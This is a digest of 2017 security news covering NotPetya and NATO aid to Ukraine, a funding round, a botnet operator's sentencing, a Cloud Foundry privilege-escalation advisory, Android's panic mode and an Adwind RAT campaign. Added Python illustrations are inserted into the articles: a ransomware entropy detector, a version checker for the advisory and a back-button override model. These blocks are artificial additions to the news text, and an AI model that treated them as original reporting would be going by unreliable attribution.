Two examples will immediately come to mind: the power disruptions over the Christmas period of 2015, and the more recent NotPetya ransomware outbreak. The latter started in the Ukraine before spreading worldwide. It appears to have emanated from Ukrainian accounting software called MEDoc, but is now thought by some to be a wiper cyberweapon disguised as ransomware "apparently launched by the same threat group that initiated numerous other attacks against the country’s power grid, mining and railway systems, and Ukrainian government organizations."

NATO's official policy towards Ukraine is to bolster its independence.

"A sovereign, independent and stable Ukraine, firmly committed to democracy and the rule of law, is key to Euro-Atlantic security," it says. "Since 2014, in the wake of the Russia-Ukraine conflict, cooperation has been intensified in critical areas."

Cyber security is one of those critical areas. In December 2014, NATO established a Trust Fund designed "to provide Ukraine with the necessary support to develop its strictly defensive, CSIRT-type technical capabilities, including laboratories to investigate cyber security incidents."

By June 2016, eight nations had contributed a total of €965,000, plus in-kind contributions from Estonia and the USA. This week, the project appears to have moved to the next step at a joint briefing with NATO secretary general, Jens Stoltenberg, and Ukrainian president Petro Poroshenko in Kiev on Monday.

Ukrinform, the national news agency of Ukraine, reported Monday, "He [Stoltenberg] said that one of the areas where the alliance was paying more attention in its cooperation with Ukraine was the sector of cyber security. NATO is currently in the process of providing Ukraine with new equipment for some key government institutions and authorities, which will enable Ukraine to investigate who is behind certain cyber-attacks, because the response to them is extremely important, Stoltenberg said. And it should also help Ukraine protect its key government institutions from cyber-attacks, he added."

NotPetya is exactly the sort of cyber-attack that such defenses will need to prevent.


HyTrust Acquires DataGravity, Raises $36 Million

11.7.2017 securityweek  IT

Cloud security firm HyTrust today announced that it has acquired data visibility and security company DataGravity, and raised $36 million in a new funding round.

Terms of the acquisition have not been disclosed, but members of the DataGravity team will join HyTrust. By acquiring DataGravity, HyTrust hopes to further enhance its security policy enforcement capabilities for cloud workloads through new data discovery and classification expertise.

DataGravity, which in the past years managed to raise a total of $92 million, exited stealth mode in 2014 when it launched Discovery, a platform that provided data security, and search and discovery capabilities. The company later released the DataGravity for Virtualization virtual appliance.

HyTrust’s decision to acquire DataGravity comes shortly after Forrester estimated that the global cloud security market will increase to $3.5 billion by 2021, which represents an annual growth rate of 28 percent.

“The acquisition will accelerate the expansion of HyTrust's platform capabilities and capitalize on the high-growth cloud security market,” said Eric Chiu, co-founder and president of HyTrust. “DataGravity's data discovery and classification capabilities support HyTrust's mission to deliver a security policy framework that provides customers with full visibility, insight and enforcement of policy across workloads. We couldn't be more excited.”

HyTrust also announced that it has closed a $36 million funding round led by investment firm Advance Venture Partners (AVP), which brings the total raised by the company to $100 million. Sway Ventures, Epic Ventures, Vanedge Capital, Trident Capital, and strategic investors Cisco, Fortinet, Intel and VMware also participated.

Part of the $36 million has been used to acquire DataGravity; the rest will go towards expanding sales and marketing efforts and funding new product development.

“HyTrust is very well positioned to capitalize on a tremendous growth opportunity in the cloud security space,” said David ibnAle, founding partner at AVP. “The need for security, automated compliance and policy enforcement for cloud infrastructure and data is critical in almost every industry, and HyTrust is front and center in this field. Gartner's recent highlighting of the sector as a top security technology for 2017 underscores the relevance of HyTrust's solutions, and we are extremely excited about the opportunity to back the market leader in this space.”


Calling Artificial Intelligence to Counter Ransomware Attacks
11.7.2017 securityaffairs Ransomware

Progress in artificial intelligence has incited intense debate worldwide, and some experts are now calling on AI to counter malware attacks.
In the short span of six weeks, the world was hit twice by major ransomware attacks: malicious software that seizes the data stored on your computer systems and offers to release it only once a ransom is paid.

It goes without saying that the world is in dire need of better defense mechanisms, and mercifully they have started to appear, though slowly and in piecemeal fashion. The day we feel completely secure, we may have artificial intelligence to thank.

Ransomware is not necessarily the trickiest or the most dangerous form of malware that can get into your computer, but it is certainly infuriating and in many cases devastating. Most infections that sneak onto your systems don't lock down your personal pictures or documents the way ransomware does, nor do they demand money.

Despite knowing the risks, many users are not savvy enough to keep up with security software updates. Both of the recent ransomware attacks hit users who had failed to install the security update that Microsoft released for Windows a few months earlier.

Artificial Intelligence
Progress in artificial intelligence has incited intense debate worldwide. Science fiction is nearing reality, and AI products are entering households and workplaces. Concern about AI taking over the job market is rising, and there is live discussion of the detrimental effects of an AI singularity that takes over the world and terminates the human race.

Though these debates are all valid, I strongly hold the opinion that AI should not be confined to home gadgets or to process optimization and automation. Instead, it can be put to use in solving the greater problems the world faces.


AI in tackling Ransomware
2015 saw around 707 million records exposed in data breaches, while in 2016 the figure reached 554 million in just the first half.

Detecting Malware
Earlier, malicious programs were identified by matching a program's code against a database of known malware signatures. This method was only as good as the database and inevitably fell behind, allowing new malware variants to slip through.

Hence, security companies started to judge malware by its behaviour. In the case of ransomware, for instance, the software repeatedly tries to lock files by encrypting them. But the same signal can also flag ordinary activity, such as file compression, which likewise produces unreadable, high-entropy output.

Modern techniques instead consider a combination of behaviours: for example, a program that encrypts files without displaying a progress bar could be flagged as surreptitious. The drawback is that waiting for enough evidence slows down identification, and the malware may lock some files before it is stopped.
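As an added illustration of the trade-off described above (not code from the article or from any vendor), the following Python sketch scores file writes per process the way a behavioural monitor might: a write is "ciphertext-like" when its byte entropy is high, and a process is flagged once it overwrites many distinct files with such data inside a short window. The events, thresholds, process IDs and paths are constructed for the example; the `trust_magic` switch shows the compression false positive the text mentions, since a backup tool writing gzip archives of incompressible data looks identical to an encryptor until container magic bytes are taken into account.

```python
import gzip
import hashlib
import math
from collections import defaultdict, deque

# Magic bytes of common compressed/container formats. A high-entropy write that
# starts with one of these is most likely legitimate compression, not encryption.
KNOWN_MAGIC = {
    b"\x1f\x8b": "gzip",
    b"PK\x03\x04": "zip",
    b"7z\xbc\xaf\x27\x1c": "7z",
    b"Rar!\x1a\x07": "rar",
    b"BZh": "bzip2",
    b"\xfd7zXZ\x00": "xz",
}

ENTROPY_THRESHOLD = 7.0   # bits per byte; plain documents usually sit around 4-5
WINDOW_S = 5.0            # sliding window per process (example value)
BURST_THRESHOLD = 10      # distinct files overwritten with ciphertext-like data in the window


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte (0.0 for empty input, 8.0 for a uniform byte distribution)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def known_container(data: bytes):
    """Name of the recognised compressed format the data starts with, or None."""
    for magic, name in KNOWN_MAGIC.items():
        if data.startswith(magic):
            return name
    return None


def looks_encrypted(data: bytes, trust_magic: bool = True) -> bool:
    """Ciphertext-like: high entropy and (if trust_magic) not a known compressed format."""
    if trust_magic and known_container(data) is not None:
        return False
    return shannon_entropy(data) >= ENTROPY_THRESHOLD


def detect_bursts(events, trust_magic=True, window_s=WINDOW_S, burst=BURST_THRESHOLD):
    """events: iterable of (timestamp_s, pid, path, bytes_written), sorted by timestamp.

    Returns {pid: timestamp_of_first_alert} for processes that overwrote at least
    `burst` distinct files with ciphertext-like data inside a `window_s` sliding window.
    """
    recent = defaultdict(deque)   # pid -> deque of (timestamp, path) for suspicious writes
    alerts = {}
    for ts, pid, path, data in events:
        if not looks_encrypted(data, trust_magic):
            continue
        q = recent[pid]
        q.append((ts, path))
        while q and ts - q[0][0] > window_s:
            q.popleft()
        if pid not in alerts and len({p for _, p in q}) >= burst:
            alerts[pid] = ts
    return alerts


def pseudo_random(seed: str, size: int = 512) -> bytes:
    """Deterministic stand-in for ciphertext (SHA-256 in counter mode over the seed)."""
    out = b""
    i = 0
    while len(out) < size:
        out += hashlib.sha256(f"{seed}:{i}".encode()).digest()
        i += 1
    return out[:size]


def sample_events():
    """Constructed file-write events from three processes (not real telemetry):
    pid 100 saves plain text, pid 200 is a backup tool writing gzip archives of
    incompressible data, pid 300 overwrites documents with ciphertext-like bytes."""
    text = b"Quarterly report: revenue grew modestly; see appendix for details.\n" * 8
    events = []
    for i in range(12):
        t = i * 0.5
        events.append((t, 100, f"/home/alice/docs/report{i}.txt", text))
        events.append((t, 200, f"/home/alice/backup/report{i}.txt.gz",
                       gzip.compress(pseudo_random(f"doc{i}"), mtime=0)))
        events.append((t, 300, f"/home/alice/docs/report{i}.txt.locked", pseudo_random(f"enc{i}")))
    return sorted(events, key=lambda e: e[0])


if __name__ == "__main__":
    ev = sample_events()
    print("magic trusted:", detect_bursts(ev))                      # only pid 300
    print("magic ignored:", detect_bursts(ev, trust_magic=False))   # pids 200 and 300
```

Entropy alone cannot distinguish the backup tool from the encryptor; the magic-byte check buys back that false positive, and the burst threshold is what costs the detector the first few files, which is exactly the delay the paragraph above describes.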

Provision
The growing number of alerts generated by traditional tools only adds to the struggle of security teams. AI, with its ability to learn and automate, can raise effectiveness and cut cost, guarding us against attacks from terrorism down to smaller-scale incidents.

Moving further, the existing AI-centric solutions in the industry are more proactive: they anticipate attacks by detecting patterns and anomalies associated with malicious content.

Secureworks uses the predictive capabilities of AI for advanced threat recognition globally. SiftScience, Cylance, and Deep Instinct use it for fraud prevention and for endpoint security on devices such as smartphones and laptops. These technologies have the potential to radically extend the reach and scale of security specialists and enable them to sense incoming threats before they materialize.


Russian Hacker Living in U.S. Sentenced to Prison

11.7.2017 securityweek BigBrothers

A Russian-born U.S. citizen has been sentenced to 110 months in prison for running a sophisticated cybercrime operation that involved botnets, stolen financial data and money laundering.

Alexander Tverdokhlebov, 29, has been living in Los Angeles. He emigrated from Russia in 2007 and later obtained U.S. citizenship.

According to U.S. authorities, Tverdokhlebov had been an active member of several exclusive Russian-speaking cybercrime forums since at least 2008. He is said to have offered various services, including the laundering of illegal proceeds.

The man also operated botnets that allowed cybercriminals to steal payment cards and other data. Investigators said Tverdokhlebov boasted about possessing 40,000 credit card numbers and controlling as many as half a million computers between 2009 and 2013.

The hacker sold the stolen card data to individuals who used it to make fraudulent purchases or withdrawals from the victims’ accounts. He is also said to have recruited Russian students visiting the U.S. to receive money from victims and then forward it to Tverdokhlebov and his accomplices.

Authorities believe Tverdokhlebov's activities resulted in losses of between $9.5 million and $25 million. When he was arrested, investigators found $275,000 in cash distributed across several safety deposit boxes in Las Vegas and Los Angeles. They also seized Bitcoin and other assets valued at roughly $5 million.

Tverdokhlebov pleaded guilty to wire fraud in late March and he has now been sentenced to 110 months in prison and three years of supervised release, which includes the monitoring of his computer use.

Several Russian nationals have been charged or convicted recently for cybercrimes in the United States. Yevgeniy Aleksandrovich Nikulin has been charged for hacking into the systems of LinkedIn, Dropbox and Formspring and will be extradited from the Czech Republic, two Russian Federal Security Service (FSB) officers have been indicted over the 2014 Yahoo hack, and the author of the Citadel malware recently pleaded guilty.

A lengthy prison sentence was given recently to 32-year-old Roman Valeryevich Seleznev, convicted on 38 counts in relation to a point-of-sale (PoS) hacking scheme.


Cloud Foundry has disclosed a privilege escalation flaw in User Account and Authentication software
11.7.2017 securityaffairs Hacking

The Open source devops platform Cloud Foundry fixed a bug that affects its User Account and Authentication server software.
The Open source devops platform Cloud Foundry has disclosed a vulnerability, tracked as CVE-2017-8032, that affects its User Account and Authentication server software. The flaw, rated by the organization as high-severity, could be exploited by zone administrators to escalate their privileges when mapping permissions for an external provider.

User Account and Authentication (UAA) is Cloud Foundry's identity management service; it issues tokens as an OAuth2 authorization server and supports multiple identity zones, each with its own administrators and external identity providers. A zone administrator is meant to be confined to their own zone, which is why a privilege escalation across that boundary matters.


CVE-2017-8032 was patched in an update last week, and the detailed advisory was published on June 12.

“In Cloud Foundry cf-release versions prior to v264; UAA release all versions of UAA v2.x.x, 3.6.x versions prior to v3.6.13, 3.9.x versions prior to v3.9.15, 3.20.x versions prior to v3.20.0, and other versions prior to v4.4.0; and UAA bosh release (uaa-release) 13.x versions prior to v13.17, 24.x versions prior to v24.12, 30.x versions prior to 30.5, and other versions prior to v41, zone administrators are allowed to escalate their privileges when mapping permissions for an external provider,” reads the description published by MITRE.

The vulnerability affects the following versions of UAA and cf-release versions prior to v264:

UAA release:
All versions of UAA v2.x.x
3.6.x versions prior to v3.6.13
3.9.x versions prior to v3.9.15
3.20.x versions prior to v3.20.0
Other versions prior to v4.4.0
UAA bosh release (uaa-release):
13.x versions prior to v13.17
24.x versions prior to v24.12
30.x versions prior to 30.5
Other versions prior to v41
The Cloud Foundry security advisory highlights that a foundation is vulnerable only if all of the following conditions are satisfied:

You are using multiple zones in UAA
You are giving out admin privileges for managing external providers (LDAP/SAML/OIDC) and corresponding group mappings
You have enabled LDAP/SAML/OIDC providers and external group mappings
Making any one of these conditions false removes the exposure, and Cloud Foundry suggests this as a mitigation until the patch is applied.

The advisory links to the fixes: Cloud Foundry deployments should upgrade cf-release to v264 or later, and standalone UAA users should upgrade to a patched UAA release from the list above.
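The version list above is easy to misread by hand, so here is an added Python helper (not part of Cloud Foundry or the advisory) that encodes those ranges together with the three preconditions. The function names and the labels returned by `exposure()` are this example's own choices.

```python
import re

# Version ranges from the Cloud Foundry advisory for CVE-2017-8032, as listed above.
# Each rule: (series prefix, first fixed version in that series); None = whole series affected.
UAA_RULES = [((2,), None), ((3, 6), "3.6.13"), ((3, 9), "3.9.15"), ((3, 20), "3.20.0")]
UAA_OTHER_FIXED = "4.4.0"
UAA_RELEASE_RULES = [((13,), "13.17"), ((24,), "24.12"), ((30,), "30.5")]
UAA_RELEASE_OTHER_FIXED = "41"
CF_RELEASE_FIXED = "264"


def parse_version(v: str) -> tuple:
    """'v3.6.13' -> (3, 6, 13); 'v41' -> (41, 0, 0). Trailing non-numeric parts are dropped."""
    nums = []
    for part in v.strip().lstrip("vV").split("."):
        m = re.match(r"\d+", part)
        if not m:
            break
        nums.append(int(m.group()))
    if not nums:
        raise ValueError(f"unparseable version: {v!r}")
    return tuple(nums + [0] * (3 - len(nums)))[:3]


def _vulnerable(version: str, rules, other_fixed: str) -> bool:
    """True if `version` falls in an affected range: a listed series before its fix,
    or any other series before the general fix version."""
    v = parse_version(version)
    for prefix, fixed in rules:
        if v[:len(prefix)] == prefix:
            return True if fixed is None else v < parse_version(fixed)
    return v < parse_version(other_fixed)


def uaa_vulnerable(version: str) -> bool:
    return _vulnerable(version, UAA_RULES, UAA_OTHER_FIXED)


def uaa_release_vulnerable(version: str) -> bool:
    return _vulnerable(version, UAA_RELEASE_RULES, UAA_RELEASE_OTHER_FIXED)


def cf_release_vulnerable(version: str) -> bool:
    return parse_version(version) < parse_version(CF_RELEASE_FIXED)


def exposure(version_vulnerable: bool, multiple_zones: bool,
             delegated_provider_admin: bool, external_providers: bool) -> str:
    """Apply the advisory's three preconditions: a foundation is exposed only when
    it runs an affected version AND all three conditions hold."""
    if not version_vulnerable:
        return "patched"
    if multiple_zones and delegated_provider_admin and external_providers:
        return "exposed: patch now"
    return "affected version, not exposed: one precondition is false (keep it that way until patched)"


if __name__ == "__main__":
    for v in ("2.7.4", "3.6.12", "3.6.13", "3.7.0", "4.3.0", "4.4.0"):
        print(f"UAA {v:>7}: {'affected' if uaa_vulnerable(v) else 'fixed'}")
    print(exposure(uaa_vulnerable("4.3.0"), True, True, True))
```

Note that the advisory's own wording makes the 3.20.x line a no-op ("prior to v3.20.0" matches nothing), which the helper reproduces rather than second-guesses.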


Google Silently Adds 'Panic Detection Mode' to Android 7.1 – How It's Useful
11.7.2017 thehackernews  Android
How often do you press the 'back' or 'Home' button on your mobile device to exit an application immediately?
Probably several times a day, because many apps have no exit button that force-closes them; instead you press back, and back, and back until they exit.
Sometimes Android users expect the back button to take them to the previous screen, but sometimes they really want to exit the app immediately.
This has real usability implications, since many users are dealing with low-performance devices and believe that pressing the back button repeatedly kills the app and frees memory, which it does not.
Google has now addressed this and quietly included a feature in Android 7.1 Nougat that lets users exit an app by pressing 'back' four times within 0.3 seconds.
Dubbed "Panic Detection Mode," the feature runs in the background of the operating system, detects the panic of a user repeatedly pressing the back button to exit an app, and lets the OS override the application and send the user safely back to the home screen.

While Google made no public announcement about panic detection mode, XDA Developers yesterday unearthed the feature in the source code of Android 7.1 Nougat.
Since then, a number of media outlets have described it as a security feature that protects Android devices from malicious applications.
It has been reported as a new security feature that counts how many times a user presses the back button within a certain amount of time and lets users escape apps that go rogue and try to take control of the device.
But the feature seems to have been developed by Google's engineers with usability, not security, as the priority.
Activating panic detection mode neither automatically detects a malicious app and reports it to Google, nor behaves differently for a legitimate app.
It can, however, help Android users kill a rogue app instantly; but it is still up to users to identify malicious apps and remove them manually.
So the feature is also useful if a malicious application takes over the display and prevents you from backing out of it.
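To make the override concrete, here is an added Python model of the rule as the article describes it (four presses within 300 ms); it is not Android's code, and the `App` and `Shell` classes are this example's simplification of a foreground activity and the OS layer beneath it. The point it demonstrates is that the press count is kept by the OS, so a rogue app that swallows every back press still gets dismissed, while a slow sequence of presses never triggers it and a well-behaved app exits the ordinary way.

```python
from collections import deque

PANIC_PRESSES = 4       # press count and window as reported in the article
PANIC_WINDOW_MS = 300


class PanicBackDetector:
    """Sliding-window counter: fires once `presses` back presses land inside `window_ms`."""

    def __init__(self, presses: int = PANIC_PRESSES, window_ms: int = PANIC_WINDOW_MS):
        self.presses = presses
        self.window_ms = window_ms
        self._times = deque()

    def on_back(self, now_ms: int) -> bool:
        self._times.append(now_ms)
        while self._times and now_ms - self._times[0] > self.window_ms:
            self._times.popleft()          # drop presses that fell out of the window
        if len(self._times) >= self.presses:
            self._times.clear()
            return True
        return False


class App:
    """Toy foreground activity. A well-behaved app pops one screen per back press and
    exits when its stack is empty; a rogue overlay consumes every press and never exits."""

    def __init__(self, name: str, screens, consumes_back: bool = False):
        self.name = name
        self.stack = list(screens)
        self.consumes_back = consumes_back

    def on_back(self) -> bool:
        """True if the app wants to stay in the foreground after this press."""
        if self.consumes_back:
            return True
        self.stack.pop()
        return bool(self.stack)


class Shell:
    """The OS layer: counts the press before handing it to the app, so an app that
    swallows the key cannot hide the press from the detector."""

    def __init__(self, app: App, panic_enabled: bool = True):
        self.app = app
        self.detector = PanicBackDetector() if panic_enabled else None
        self.foreground = app.name

    def press_back(self, now_ms: int) -> str:
        if self.foreground == "home":
            return self.foreground
        panic = self.detector is not None and self.detector.on_back(now_ms)
        stays = self.app.on_back()
        if panic or not stays:
            self.foreground = "home"     # OS override, or the app exited normally
        return self.foreground

    def run(self, press_times_ms) -> str:
        for t in press_times_ms:
            self.press_back(t)
        return self.foreground


if __name__ == "__main__":
    rogue = lambda: App("rogue", ["overlay"], consumes_back=True)
    print("rogue, panic off, fast presses:", Shell(rogue(), panic_enabled=False).run([0, 50, 100, 150]))
    print("rogue, panic on,  fast presses:", Shell(rogue()).run([0, 50, 100, 150]))
    print("rogue, panic on,  slow presses:", Shell(rogue()).run([0, 500, 1000, 1500]))
    print("mail app, three slow presses:  ", Shell(App("mail", ["inbox", "thread", "compose"])).run([0, 500, 1000]))
```

The slow-press case is the usability half of the design: a user stepping back through screens at a normal pace never trips the detector, so legitimate apps see no change in behaviour.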
The 'panic detection mode' feature is currently limited to devices running Android 7.1 Nougat and is not available to all Android users, XDA Developers pointed out. It is also disabled by default and must be enabled explicitly.
Google works hard to keep its Android operating system safe and secure, but malware still finds its way onto the platform, especially through malicious apps, even on Google's own Play Store.
Google also appears to have plans for wider implementation of 'panic detection mode' in upcoming versions of Android and will most likely enable it by default in future releases.


Adwind RAT Returns! Cross-Platform Malware Targeting Aerospace Industries
11.7.2017 thehackernews Virus

Hackers and cyber criminals are becoming dramatically more adept, innovative, and stealthy with each passing day.
With more operating systems in widespread use, cybercriminals have shifted from traditional activities to more clandestine, cross-platform techniques that offer many attack vectors and low detection rates.
Security researchers have discovered that the infamous Adwind, a popular cross-platform Remote Access Trojan written in Java, has re-emerged and is currently being used to "target enterprises in the aerospace industry, with Switzerland, Austria, Ukraine, and the US the most affected countries."
Adwind — also known as AlienSpy, Frutas, jFrutas, Unrecom, Sockrat, JSocket, and jRat — has been in development since 2013 and is capable of infecting all the major operating systems, including Windows, Mac, Linux, and Android.

Adwind has several malicious capabilities, including stealing credentials, keylogging, taking pictures or screenshots, and gathering and exfiltrating data. The trojan can even turn infected machines into a botnet used to disrupt online services through DDoS attacks.
Researchers from Trend Micro recently noticed a sudden rise in the number of Adwind infections during June 2017 — at least 117,649 instances in the wild, which is 107 percent more than the previous month.
According to a blog post published today, the malicious campaign was noticed on two different occasions.
The first, observed on June 7, used a link to divert victims to .NET-written malware equipped with spyware capabilities, while the second wave, noticed on June 14, used different domains to host the malware and its command-and-control servers.
Both waves employed a similar social engineering tactic to trick victims into clicking malicious links in a spam email impersonating the chair of the Mediterranean Yacht Broker Association (MYBA) Charter Committee.
Once it has infected a machine, the malware also collects the system's fingerprint, along with the list of installed antivirus and firewall applications.
"It can also perform reflection, a dynamic code generation in Java. The latter is a particularly useful feature in Java that enables developers/programmers to dynamically inspect, call, and instantiate attributes and classes at runtime. In cybercriminal hands, it can be abused to evade static analysis from traditional antivirus (AV) solutions," the researchers wrote.
My advice for users who want to stay protected from such malware: always be suspicious of unsolicited documents sent over email, and never click on links inside them without verifying the source.
Additionally, keep your systems and antivirus products up to date to protect against the latest threats.